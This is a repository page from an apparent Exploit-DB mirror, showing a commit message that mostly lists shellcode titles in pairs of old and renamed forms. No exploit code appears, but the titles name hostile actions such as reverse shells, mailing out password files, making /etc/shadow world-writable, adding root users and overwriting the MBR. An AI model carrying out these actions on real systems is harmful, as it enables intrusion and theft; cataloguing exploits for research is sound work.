bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/windows/shellcode/39794.c
Offensive Security c7b4bfd8e6 DB: 2017-08-23 
23 new exploits

Microsoft Windows 7 SP1 x86 -  GDI Palette Objects Local Privilege Escalation (MS17-017)
Microsoft Windows 7 SP1 x86 - GDI Palette Objects Local Privilege Escalation (MS17-017)
Disk Pulse Enterprise 9.9.16 - 'Import Command' Buffer Overflow
Disk Savvy Enterprise 9.9.14 - 'Import Command' Buffer Overflow
VX Search Enterprise 9.9.12 - 'Import Command' Buffer Overflow
Microsoft Windows - Escalate UAC Protection Bypass (Via COM Handler Hijack) (Metasploit)

IBM OpenAdmin Tool - SOAP welcomeServer PHP Code Execution (Metasploit)

BSD - Passive Connection Shellcode (124 bytes)
BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)
BSD/x86 - setuid(0) then execve /bin/sh Shellcode (30 bytes)
BSD/x86 - Bind Shell  31337/TCP + setuid(0) Shellcode (94 bytes)
BSD/x86 - execve /bin/sh multiplatform Shellcode (27 bytes)
BSD/x86 - execve /bin/sh setuid (0) Shellcode (29 bytes)
BSD/x86 - Bind Shell 31337/TCP Shellcode (83 bytes)
BSD/x86 - Bind Random Port Shellcode (143 bytes)
BSD/x86 - setuid(0) + execve /bin/sh Shellcode (30 bytes)
BSD/x86 - Bind TCP Shell (31337/TCP) + setuid(0) Shellcode (94 bytes)
BSD/x86 - execve /bin/sh Shellcode (27 bytes)
BSD/x86 - execve /bin/sh + setuid(0) Shellcode (29 bytes)
BSD/x86 - Bind TCP Shell (31337/TCP) Shellcode (83 bytes)
BSD/x86 - Bind TCP Shell (Random Port) Shellcode (143 bytes)
BSD/x86 - execve /bin/sh Crypt Shellcode (49 bytes)
BSD/x86 - execve /bin/sh ENCRYPT* Shellcode (57 bytes)
BSD/x86 - Connect torootteam.host.sk:2222 Shellcode (93 bytes)
BSD/x86 - cat /etc/master.passwd | mail [email] Shellcode (92 bytes)
BSD/x86 - execve /bin/sh Encoded Shellcode (49 bytes)
BSD/x86 - execve /bin/sh Encoded Shellcode (57 bytes)
BSD/x86 - Reverse TCP Shell (torootteam.host.sk:2222/TCP) Shellcode (93 bytes)
BSD/x86 - execve /bin/cat /etc/master.passwd | mail [email] Shellcode (92 bytes)
BSDi/x86 - execve /bin/sh toupper evasion Shellcode (97 bytes)
FreeBSD i386 & AMD64 - Execve /bin/sh Shellcode (Anti-Debugging) (140 bytes)
BSDi/x86 - execve /bin/sh ToUpper Encoded Shellcode (97 bytes)
FreeBSD x86 / x64 - execve /bin/sh Anti-Debugging Shellcode (140 bytes)
FreeBSD/x86 - connect back.send.exit /etc/passwd Shellcode (112 bytes)
FreeBSD/x86 - kill all processes Shellcode (12 bytes)
FreeBSD/x86 - rev connect + recv + jmp + return results Shellcode (90 bytes)
FreeBSD/x86 - /bin/cat /etc/master.passwd Null-Free Shellcode (65 bytes)
FreeBSD/x86 - Reverse /bin/sh Shell (127.0.0.1:8000) Shellcode (89 bytes)
FreeBSD/x86 - setuid(0); execve(ipf -Fa); Shellcode (57 bytes)
FreeBSD/x86 - /bin/sh Encrypted Shellcode (48 bytes)
FreeBSD/x86 - Reverse TCP cat /etc/passwd (192.168.1.33:8000/TCP) Shellcode (112 bytes)
FreeBSD/x86 - Kill All Processes Shellcode (12 bytes)
FreeBSD/x86 - ConnectBack (172.17.0.9:8000/TCP) + Receive Shellcode + JMP + Return Results Null-Free Shellcode (90 bytes)
FreeBSD/x86 - execve /bin/cat /etc/master.passwd Null-Free Shellcode (65 bytes)
FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:8000) Null-Free Shellcode (89 bytes)
FreeBSD/x86 - setuid(0); + execve(ipf -Fa); Shellcode (57 bytes)
FreeBSD/x86 - execve /bin/sh Encoded Shellcode (48 bytes)

FreeBSD/x86 - execve /bin/sh Shellcode (2) (23 bytes)
FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes)

FreeBSD/x86 - kldload /tmp/o.o Shellcode (74 bytes)
FreeBSD/x86 - Load Kernel Module (/sbin/kldload /tmp/o.o) Shellcode (74 bytes)

FreeBSD/x86 - Connect Port 31337 Shellcode (102 bytes)
FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (102 bytes)
Linux/x86 - Bind Shellcode (Generator)
Windows XP SP1 - Bind Shellcode (Generator)
(Generator) - /bin/sh Polymorphic With Printable ASCII Characters Shellcode
Linux/x86 - cmd Null-Free Shellcode (Generator)
(Generator) - Alphanumeric Shellcode (Encoder/Decoder)
Linux/x86 - Bind TCP Shellcode (Generator)
Windows XP SP1 - Bind TCP Shell Shellcode (Generator)
Linux - execve /bin/sh Polymorphic With Printable ASCII Characters Shellcode (Generator)
Linux/x86 - Command Null-Free Shellcode (Generator)
Windows - Reverse TCP Shell (127.0.0.1:123/TCP) Alphanumeric Shellcode (Encoder/Decoder) (Generator)
Win32 - Multi-Format Encoding Tool Shellcode (Generator)
iOS - Version-independent Shellcode
Cisco IOS - Connectback 21/TCP Shellcode
Windows x86 - Multi-Format Encoding Tool Shellcode (Generator)
iOS Version-independent - Null-Free Shellcode
Cisco IOS - New TTY / Privilege Level To 15 / Reverse Virtual Terminal Shell (21/TCP) Shellcode
Linux/x86-64 - Flush IPTables Rules Shellcode (84 bytes)
Linux/x86-64 - Reverse TCP Semi-Stealth Shell  Shellcode (88+ bytes)  (Generator)
Linux/MIPS (Linksys WRT54G/GL) - Bind 4919/TCP Shellcode (276 bytes)
Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes)
Linux/x86-64 - Reverse TCP Semi-Stealth /bin/bash Shell Shellcode (88+ bytes) (Generator)
Linux/MIPS (Linksys WRT54G/GL) - Bind TCP /bin/sh Shell (4919/TCP) Shellcode (276 bytes)

Linux/PPC - connect back (192.168.1.1:31337) execve /bin/sh Shellcode (240 bytes)
Linux/PPC - Reverse TCP /bin/sh Shell (192.168.1.1:31337/TCP) Shellcode (240 bytes)

Linux/SPARC - Bind 8975/TCP Shellcode (284 bytes)
Linux/SPARC - Bind TCP Shell (8975/TCP) Null-Free Shellcode (284 bytes)
Linux/x86 - killall5 polymorphic Shellcode (61 bytes)
Linux/x86 - /bin/sh Polymorphic Shellcode (48 bytes)
Linux/x86 - Bind 4444/TCP Shellcode (XOR Encoded) (152 bytes)
Linux/x86 - reboot() polymorphic Shellcode (57 bytes)
Linux/x86 - chmod(_/etc/shadow__666) Polymorphic Shellcode (54 bytes)
Linux/x86 - setreuid(geteuid()_geteuid())_execve(_/bin/sh__0_0) Shellcode (34 bytes)
Linux/x86 - Bind 8000/TCP + Execve Iptables -F Shellcode (176 bytes)
Linux/x86 - Bind 8000/TCP + Add Root User Shellcode (225+ bytes)
Linux/x86 - Bind 8000/TCP ASM Code Linux Shellcode (179 bytes)
Linux/x86 - killall5 Polymorphic Shellcode (61 bytes)
Linux/x86 - execve /bin/sh Polymorphic Shellcode (48 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) XOR Encoded Shellcode (152 bytes)
Linux/x86 - reboot() Polymorphic Shellcode (57 bytes)
Linux/x86 - chmod 666 /etc/shadow Polymorphic Shellcode (54 bytes)
Linux/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh__0_0) Shellcode (34 bytes)
Linux/x86 - Bind TCP Shell (8000/TCP) + Flush IPTables Rules (/sbin/iptables -F) Shellcode (176 bytes)
Linux/x86 - Bind TCP Shell (8000/TCP) + Add Root User Shellcode (225+ bytes)
Linux/x86 - Bind TCP /bin/sh Shell (8000/TCP) Shellcode (179 bytes)

Linux/x86 - Serial port shell binding + busybox Launching Shellcode (82 bytes)
Linux/x86 - Serial Port Shell Binding (/dev/ttyS0) + busybox Launching Null-Free Shellcode (82 bytes)

Linux/x86 - chmod(_/etc/shadow__666) + exit(0) Shellcode (30 bytes)
Linux/x86 - chmod 666 /etc/shadow + exit(0) Shellcode (30 bytes)

Linux/x86 - Shellcode Obfuscator (Generator)
Linux/x86 - Shellcode Obfuscator Null-Free (Generator)
Linux/x86 - setuid(0) + execve(/bin/sh_0_0) Shellcode (28 bytes)
Linux/x86 - setresuid(0_0_0) /bin/sh Shellcode (35 bytes)
Linux/x86 - setuid(0) + execve(/bin/sh_0_0) Null-Free Shellcode (28 bytes)
Linux/x86 - setresuid(0_0_0) + /bin/sh Shellcode (35 bytes)

Linux/x86 - Reverse TCP /etc/shadow (8192/TCP) Shellcode (155 bytes)
Linux/x86 - Reverse TCP cat /etc/shadow (8192/TCP) Shellcode (155 bytes)

Linux/x86 - setuid(0) . setgid(0) . aslr_off Shellcode (79 bytes)
Linux/x86 - setuid(0) + setgid(0) + aslr_off (Disable ASLR Security) Shellcode (79 bytes)

Linux/x86 - /sbin/iptables -F Shellcode (40 bytes)
Linux/x86 - Flush IPTables Rules (/sbin/iptables -F)  Shellcode (40 bytes)

Linux/x86 - /sbin/ipchains -F Shellcode (40 bytes)
Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (40 bytes)
Linux/x86 - HTTP/1.x GET_ Downloads + execve() Shellcode (111+ bytes)
Linux/x86 - executes command after setreuid Shellcode (49+ bytes)
Linux/x86 - HTTP/1.x GET + Downloads + execve() Null-Free Shellcode (111+ bytes)
Linux/x86 - setreuid + executes command (49+ bytes)
Linux/x86 - Bind 31337/TCP + setuid Shellcode (96 bytes)
Linux/x86 - Bind 2707/TCP Shellcode (84 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + setuid Shellcode (96 bytes)
Linux/x86 - Bind TCP Shell (2707/TCP) Shellcode (84 bytes)
Linux/x86 - Bind 31337/TCP SET_PORT() Shellcode (100 bytes)
Linux/x86 - Reverse TCP Shell (192.168.13.22:31337) Shellcode (82 bytes)  (Generator)
Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (100 bytes)
Linux/x86 - Reverse TCP /bin/sh Shell (192.168.13.22:31337) Shellcode (82 bytes) (Generator)

Linux/x86 - Reverse TCP XOR Encoded Shell (127.0.0.1:80/TCP) Shellcode (371 bytes)
Linux/x86 - Reverse TCP Shell (127.0.0.1:80/TCP) XOR Encoded Shellcode (371 bytes)

Linux/x86 - /tmp/swr to SWAP restore Shellcode (109 bytes)
Linux/x86 - Read SWAP write to /tmp/swr Shellcode (109 bytes)
Linux/x86 - Bind TCP Password (gotfault) Shell (64713/TCP) Shellcode (166 bytes)
Linux/x86 - Bind 64713/TCP Shellcode (86 bytes)
Linux/x86 - Bind TCP /bin/sh Password (gotfault) Shell (64713/TCP) Shellcode (166 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (64713/TCP) Shellcode (86 bytes)

Linux/x86 - setreuid(0_0) execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (33 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (33 bytes)

Linux/x86 - TCP Proxy Shellcode (236 bytes)
Linux/x86 - TCP Proxy Null-Free Shellcode (236 bytes)
Linux/x86 - execve /bin/sh xored for Intel x86 CPUID Shellcode (41 bytes)
Linux/x86 - execve /bin/sh Shellcode (+1 Encoded) (39 bytes)
Linux/x86 - Add User (xtz) To /etc/passwd Shellcode (59 bytes)
Linux/x86 - anti-debug trick (INT 3h trap) + execve /bin/sh Shellcode (39 bytes)
Linux/x86 - Bind /bin/sh to 31337/TCP Shellcode (80 bytes)
Linux/x86 - Bind /bin/sh to 31337/TCP + fork() Shellcode (98 bytes)
Linux/x86 (Intel x86 CPUID) - execve /bin/sh XORED Encoded Shellcode (41 bytes)
Linux/x86 - execve /bin/sh Shellcode +1 Encoded (39 bytes)
Linux/x86 - Add Root User (xtz) To /etc/passwd Shellcode (59 bytes)
Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve /bin/sh Shellcode (39 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (80 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + fork() Shellcode (98 bytes)

Linux/x86 - chmod(/etc/shadow_ 0666) + exit() Shellcode (32 bytes)
Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (32 bytes)

Linux/x86 - Reverse  TCP Shell Shellcode (90 bytes)  (Generator)
Linux/x86 - Reverse TCP Shell Shellcode (90 bytes) (Generator)
Linux/x86 - read(0_buf_2541); chmod(buf_4755); Shellcode (23 bytes)
Linux/x86 - write(0__Hello core!\n__12); (with optional 7 byte exit) Shellcode (36 bytes)
Linux/x86 - snoop /dev/dsp Shellcode (172 bytes)
Linux/x86 - /bin/sh Standard Opcode Array Payload Shellcode (21 bytes)
Linux/x86 - read(0_buf_2541); + chmod(buf_4755); Shellcode (23 bytes)
Linux/x86 - write(0__Hello core!\n__12); Exit Shellcode (36/43 bytes)
Linux/x86 - snoop /dev/dsp Null-Free Shellcode (172 bytes)
Linux/x86 - execve /bin/sh Standard Opcode Array Payload Shellcode (21 bytes)
Linux/x86 - /bin/sh sysenter Opcode Array Payload Shellcode (23 bytes)
Linux/x86 - /bin/sh sysenter Opcode Array Payload Shellcode (27 bytes)
Linux/x86 - /bin/sh sysenter Opcode Array Payload Shellcode (45 bytes)
Linux/x86 - chroot + standart Shellcode (66 bytes)
Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (23 bytes)
Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (27 bytes)
Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (45 bytes)
Linux/x86 - Break chroot (../ 20x Loop) + execve /bin/sh Shellcode (66 bytes)
Linux/x86 - setreuid/execve Shellcode (31 bytes)
Linux/x86 - Alphanumeric Shellcode (64 bytes)
Linux/x86 - Alphanumeric using IMUL Method Shellcode (88 bytes)
Linux/x86 - setreuid + execve Shellcode (31 bytes)
Linux/x86 - Alphanumeric Encoded Shellcode (64 bytes)
Linux/x86 - Alphanumeric Encoder (IMUL Method) Shellcode (88 bytes)
Linux/x86 - Bind 5074/TCP (ToUpper Encoded) Shellcode (226 bytes)
Linux/x86 - Add User (t00r) Anti-IDS Shellcode (116 bytes)
Linux/x86 - Bind TCP Shell (5074/TCP) ToUpper Encoded Shellcode (226 bytes)
Linux/x86 - Add Root User (t00r) Anti-IDS Shellcode (116 bytes)
Linux/x86 - iptables -F Shellcode (45 bytes)
Linux/x86 - iptables -F Shellcode (58 bytes)
Linux/x86 - Flush IPTables Rules (/sbin/iptables -F)  Shellcode (45 bytes)
Linux/x86 - Flush IPTables Rules (/sbin/iptables -F)  Shellcode (58 bytes)

Linux/x86 - connect Shellcode (120 bytes)
Linux/x86 - Reverse TCP /bin/sh Shell Shellcode (120 bytes)

Linux/x86 - cp /bin/sh /tmp/katy ; chmod 4555 katy Shellcode (126 bytes)
Linux/x86 - cp /bin/sh /tmp/katy ; + chmod 4555 katy Shellcode (126 bytes)
Linux/x86 - execve /bin/sh setreuid(12_12) Shellcode (50 bytes)
Linux/x86 - Bind 5074/TCP Shellcode (92 bytes)
Linux/x86 - Bind 5074/TCP + fork() Shellcode (130 bytes)
Linux/x86 - Add User (t00r) Shellcode (82 bytes)
Linux/x86 - Add User Shellcode (104 bytes)
Linux/x86 - break chroot Shellcode (34 bytes)
Linux/x86 - break chroot Shellcode (46 bytes)
Linux/x86 - break chroot execve /bin/sh Shellcode (80 bytes)
Linux/x86 - execve /bin/sh + setreuid(12_12) Shellcode (50 bytes)
Linux/x86 - Bind TCP Shell (5074/TCP) Shellcode (92 bytes)
Linux/x86 - Bind TCP Shell (5074/TCP) + fork() Shellcode (130 bytes)
Linux/x86 - Add Root User (t00r) Shellcode (82 bytes)
Linux/x86 - Add Root User Shellcode (104 bytes)
Linux/x86 - Break chroot (../ 10x Loop) Shellcode (34 bytes)
Linux/x86 - Break chroot (../ 10x Loop) Shellcode (46 bytes)
Linux/x86 - Break chroot + execve /bin/sh Shellcode (80 bytes)

Linux/x86 - execve /bin/sh (XOR Encoded) Shellcode (55 bytes)
Linux/x86 - execve /bin/sh XOR Encoded Shellcode (55 bytes)

Linux/x86 - chroot()/execve() code Shellcode (80 bytes)
Linux/x86 - Add User (z) Shellcode (70 bytes)
Linux/x86 - break chroot setuid(0) + /bin/sh Shellcode (132 bytes)
Linux/x86-64 - Bind 4444/TCP Shellcode (132 bytes)
Linux/x86 - Add Root User (z) Shellcode (70 bytes)
Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve /bin/sh Shellcode (132 bytes)
Linux/x86-64 - Bind TCP Shell (4444/TCP) Shellcode (132 bytes)
Linux PPC & x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (99 bytes)
OSX PPC & x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (121 bytes)
Linux/x86 & Unix/SPARC & IRIX/MIPS - execve /bin/sh Shellcode (141 bytes)
Linux/x86 & Unix/SPARC - execve /bin/sh Shellcode (80 bytes)
Linux/x86 & bsd/x86 - execve /bin/sh Shellcode (38 bytes)
Linux/PPC / Linux/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (99 bytes)
OSX/PPC / OSX/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (121 bytes)
Linux/x86 / Unix/SPARC / IRIX/MIPS - execve /bin/sh Shellcode (141 bytes)
Linux/x86 / Unix/SPARC - execve /bin/sh Shellcode (80 bytes)
BSD/x86 / Linux/x86 - execve /bin/sh Shellcode (38 bytes)
NetBSD/x86 - setreuid(0_ 0); execve(_/bin//sh__ ..._ NULL); Shellcode (29 bytes)
NetBSD/x86 - setreuid(0_ 0); execve(_/bin//sh__ ..._ NULL); Shellcode (30 bytes)
NetBSD/x86 - setreuid(0_ 0); + execve(_/bin//sh__ ..._ NULL); Shellcode (29 bytes)
NetBSD/x86 - setreuid(0_ 0); + execve(_/bin//sh__ ..._ NULL); Shellcode (30 bytes)
OpenBSD/x86 - Bind 6969/TCP Shellcode (148 bytes)
OpenBSD/x86 - Add user _w00w00_ Shellcode (112 bytes)
OSX/PPC - sync()_ reboot() Shellcode (32 bytes)
OpenBSD/x86 - Bind TCP Shell (6969/TCP) Shellcode (148 bytes)
OpenBSD/x86 - Add Root User (w00w00) Shellcode (112 bytes)
OSX/PPC - sync() + reboot() Shellcode (32 bytes)

OSX/PPC - Add user _r00t_ Shellcode (219 bytes)
OSX/PPC - Add Root User (r00t) Shellcode (219 bytes)
Solaris/SPARC - executes command after setreuid Shellcode (92+ bytes)
Solaris/SPARC -  Reverse TCP XNOR Encoded Shell (44434/TCP) Shellcode (600 bytes) (Generator)
Solaris/SPARC - setreuid/execve Shellcode (56 bytes)
Solaris/SPARC - Bind 6666/TCP Shellcode (240 bytes)
Solaris/SPARC - setreuid + executes command Shellcode (92+ bytes)
Solaris/SPARC - Reverse TCP Shell (44434/TCP) XNOR Encoded Shellcode (600 bytes) (Generator)
Solaris/SPARC - setreuid + execve Shellcode (56 bytes)
Solaris/SPARC - Bind TCP Shell (6666/TCP) Shellcode (240 bytes)
Solaris/SPARC - Bind 6789/TCP Shellcode (228 bytes)
Solaris/SPARC - Reverse TCP Shell (192.168.1.4:5678/TCP) Shellcode (204 bytes)
Solaris/SPARC - Bind Shellcode (240 bytes)
Solaris/x86 - Bind TCP Shellcode (Generator)
Solaris/SPARC - Bind TCP /bin/sh (6789/TCP) Shellcode (228 bytes)
Solaris/SPARC - Reverse TCP /bin/sh Shell (192.168.1.4:5678/TCP) Shellcode (204 bytes)
Solaris/SPARC - Bind TCP Shell Shellcode (240 bytes)
Solaris/x86 - Bind TCP Shellcode (Generator)
Windows 5.0 < 7.0 x86 - Bind Shell 28876/TCP Null-Free Shellcode
Win32/XP SP2 (EN) - cmd.exe Shellcode (23 bytes)
Win32 - SEH Omelet Shellcode
Win32 - Bind 23/TCP Winexec Telnet Shellcode (111 bytes)
Win32 - PEB!NtGlobalFlags Shellcode (14 bytes)
Win32 XP SP2 (FR) - Sellcode cmd.exe Shellcode (32 bytes)
Win32/XP SP2 - cmd.exe Shellcode (57 bytes)
Win32 - PEB 'Kernel32.dll' ImageBase Finder Alphanumeric Shellcode (67 bytes)
Win32 - PEB 'Kernel32.dll' ImageBase Finder (ASCII Printable) Shellcode (49 bytes)
Win32 - ConnectBack + Download A File + Save + Execute Shellcode
Win32 - Download File + Execute Shellcode (Browsers Edition) (Generator) (275+ bytes)
Win32 - Download File + Execute Shellcode (192 bytes)
Win32 - Download File + Execute Shellcode (124 bytes)
Win32/NT/XP - IsDebuggerPresent Shellcode (39 bytes)
Win32 SP1/SP2 - Beep Shellcode (35 bytes)
Win32/XP SP2 - Pop up message box Shellcode (110 bytes)
Win32 - WinExec() Command Parameter Shellcode (104+ bytes)
Win32 - Download File + Execute Shellcode (226+ bytes)
Windows NT/2000/XP (Russian) - Add User 'slim' Shellcode (318 bytes)
Windows 5.0 < 7.0 x86 - Bind TCP Shell (28876/TCP) Null-Free Shellcode
Windows XP SP2 x86 (English) - cmd.exe Shellcode (23 bytes)
Windows x86 - SEH Omelet Shellcode
Windows x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes)
Windows x86 - PEB!NtGlobalFlags Shellcode (14 bytes)
Windows XP SP2 x86 (French) - Sellcode cmd.exe Shellcode (32 bytes)
Windows XP SP2 x86 - cmd.exe Shellcode (57 bytes)
Windows x86 - PEB _Kernel32.dll_ ImageBase Finder Alphanumeric Shellcode (67 bytes)
Windows x86 - PEB _Kernel32.dll_ ImageBase Finder (ASCII Printable) Shellcode (49 bytes)
Windows x86 - ConnectBack + Download A File + Save + Execute Shellcode
Windows x86 - Download File + Execute Shellcode (Browsers Edition) (275+ bytes) (Generator)
Windows x86 - Download File + Execute Shellcode (192 bytes)
Windows x86 - Download File + Execute Shellcode (124 bytes)
Windows NT/XP x86 - IsDebuggerPresent Shellcode (39 bytes)
Windows SP1/SP2 x86 - Beep Shellcode (35 bytes)
Windows XP SP2 x86 - Pop up message box Shellcode (110 bytes)
Windows x86 - WinExec() Command Parameter Shellcode (104+ bytes)
Windows x86 - Download File + Execute Shellcode (226+ bytes)
Windows NT/2000/XP (Russian) - Add Administartor User (slim/shady) Shellcode (318 bytes)

Windows XP/2000/2003 - Reverse TCP Shell (127.0.0.1:53) Shellcode (275 bytes)  (Generator)
Windows XP/2000/2003 - Reverse TCP Shell (127.0.0.1:53) Shellcode (275 bytes) (Generator)
Windows XP - Download File + Execute Shellcode
Windows XP SP1 - Bind 58821/TCP Shellcode (116 bytes)
Windows XP - Download File + Execute Null-Free Shellcode
Windows XP SP1 - Bind TCP Shell (58821/TCP) Shellcode (116 bytes)

Win64 - (URLDownloadToFileA) Download + Execute Shellcode (218+ bytes)
Windows x64 - (URLDownloadToFileA) Download + Execute Shellcode (218+ bytes)
Linux/x86 - setuid(0) + cat /etc/shadow Shellcode (49 bytes)
Linux/x86 - chmod(/etc/shadow_ 0666) + exit() Shellcode (33 bytes)
Linux/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (49 bytes)
Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (33 bytes)
Linux/x86 - overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes)
Win32 XP SP3 - ShellExecuteA Shellcode
Linux/x86 - Pverwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes)
Windows XP SP3 x86 - ShellExecuteA Shellcode
Win32 XP SP3 - Add Firewall Rule to Allow 445/TCP Traffic Shellcode
FreeBSD/x86 - Bind 1337/TCP Shellcode (167 bytes)
Win32/XP SP2 - calc.exe Shellcode (45 bytes)
Windows XP SP3 x86 - Add Firewall Rule to Allow 445/TCP Traffic Shellcode
FreeBSD/x86 - Bind TCP /bin/sh Shell (1337/TCP) Shellcode (167 bytes)
Windows XP SP2 x86 - calc.exe Shellcode (45 bytes)

Win32/XP SP2 (EN + AR) - cmd.exe Shellcode (23 bytes)
Windows XP SP2 x86 (English / Arabic) - cmd.exe Shellcode (23 bytes)

Linux/x86 - break chroot Shellcode (79 bytes)
Linux/x86 - setuid + Break chroot (mkdir/chdir/chroot _..._) + execve /bin/sh Shellcode (79 bytes)

Linux/x86 - Append '/etc/passwd' + exit() Shellcode (107 bytes)
Linux/x86 - Add Root User (toor) To /etc/passwd + exit() Shellcode (107 bytes)

Win32 XP SP2 (FR) - calc Shellcode (19 bytes)
Windows XP SP2 x86 (French) - calc Shellcode (19 bytes)
Linux/x86 - bin/cat /etc/passwd Shellcode (43 bytes)
Win32 XP SP3 (English) - cmd.exe Shellcode (26 bytes)
Win32 XP SP2 (Turkish) - cmd.exe Shellcode (26 bytes)
Linux/x86 - /bin/sh Shellcode (8 bytes)
Linux/x86 - execve /bin/cat /etc/passwd Shellcode (43 bytes)
Windows XP SP3 x86 (English) - cmd.exe Shellcode (26 bytes)
Windows XP SP2 x86 (Turkish) - cmd.exe Shellcode (26 bytes)
Linux/x86 - execve /bin/sh Shellcode (8 bytes)
Linux/x86 - disabled modsecurity Shellcode (64 bytes)
Win32 - JITed Stage-0 Shellcode
Win32 - JITed exec notepad Shellcode
Windows XP Professional SP2 (ITA) - calc.exe Shellcode (36 bytes)
Win32 - Mini HardCode WinExec&ExitProcess Shellcode (16 bytes)
Linux/x86 - Disabled modsecurity Shellcode (64 bytes)
Windows x86 - JITed Stage-0 Shellcode
Windows x86 - JITed exec notepad Shellcode
Windows XP Professional SP2 (Italian) - calc.exe Shellcode (36 bytes)
Windows XP SP2 x86 - write.exe + ExitProcess WinExec Shellcode (16 bytes)
Win32/XP SP3 (RU) - WinExec+ExitProcess cmd Shellcode (12 bytes)
Win32 - MessageBox Shellcode (Metasploit)
Windows XP SP3 x86 (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes)
Windows x86 - MessageBox Shellcode (Metasploit)
Linux/x86 - Bind nc -lvve/bin/sh -p13377 Shellcode
Linux/x86 - chmod(_/etc/shadow__ 0666) Shellcode (36 bytes)
Linux/x86 - Bind Netcat Shell (13377/TCP) Shellcode
Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes)
Linux/x86 - chmod(_/etc/shadow__ 0777) Shellcode (33 bytes)
Linux/x86 - chmod(_/etc/shadow__ 0777) Shellcode (29 bytes)
Linux - write() + exit(0) Shellcode (Genearator With Customizable Text)
Linux/x86 - chmod  0777 /etc/shadow Shellcode (33 bytes)
Linux/x86 - chmod 0777 /etc/shadow Shellcode (29 bytes)
Linux - write() + exit(0) Shellcode (Generator)

Linux/x86 - Sends 'Phuck3d!' To All Terminals Shellcode (60 bytes)
Linux/x86 - Sends _Phuck3d!_ To All Terminals Shellcode (60 bytes)

Windows XP SP2 (FR) - Download File + Execute Shellcode
Windows XP SP2 (French) - Download File + Execute Shellcode

Linux/x86 - Disable randomize stack addresse Shellcode (106 bytes)
Linux/x86 -  Disable ASLR Security Shellcode Shellcode (106 bytes)
Linux/x86 - setuid(0) + chmod(_/etc/shadow__ 0666) Polymorphic Shellcode (61 bytes)
Linux/x86 - change mode 0777 of '/etc/shadow' with sys_chmod syscall Shellcode (39 bytes)
Linux/x86 - setuid(0) + chmod 0666 /etc/shadow Polymorphic Shellcode (61 bytes)
Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/shadow Shellcode (39 bytes)

Linux/x86 - change mode 0777 of '/etc/passwd' with sys_chmod syscall Shellcode (39 bytes)
Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/passwd Shellcode (39 bytes)

Linux/x86 - Reverse  Netcat Shell (8080/TCP) Shellcode (76 bytes)
Linux/x86 - Reverse Netcat Shell (8080/TCP) Shellcode (76 bytes)

Solaris/x86 - Sync() & reboot() + exit(0) Shellcode (48 bytes)
Solaris/x86 - Sync() + reboot() + exit(0) Shellcode (48 bytes)
Linux/x86 - Bind 31337/TCP + setreuid (0_0) Polymorphic Shellcode (131 bytes)
Linux/x86-64 - setuid(0) + chmod (_/etc/passwd__ 0777) & exit(0) Shellcode (63 bytes)
Linux/x86 - Bind TCP Shell (31337/TCP) + setreuid(0_0) Polymorphic Shellcode (131 bytes)
Linux/x86-64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes)

Windows XP SP3 (SPA) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes)
Windows XP SP3 (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes)

Windows - WinExec cmd.exe + ExitProcess Shellcode (195 bytes)
Windows - cmd.exe + ExitProcess WinExec Shellcode (195 bytes)
Linux/x86 - /bin/sh Polymorphic Shellcode (116 bytes)
Linux/ARM - chmod(_/etc/shadow__ 0777) polymorphic Shellcode (84 bytes)
Linux/ARM - chmod(_/etc/shadow__ 0777) Shellcode (35 bytes)
Linux/x86 - execve /bin/sh Polymorphic Shellcode (116 bytes)
Linux/ARM - chmod 0777 /etc/shadow Polymorphic Shellcode (84 bytes)
Linux/ARM - chmod 0777 /etc/shadow Shellcode (35 bytes)
Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL); (XOR 88 encoded) Polymorphic Shellcode (78 bytes)
Linux/x86 - Bind Shell 64533 Shellcode (97 bytes)
Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL); XOR 88 Encoded Polymorphic Shellcode (78 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (64533/TCP) Shellcode (97 bytes)
Linux - setreuid(0_0) execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes)
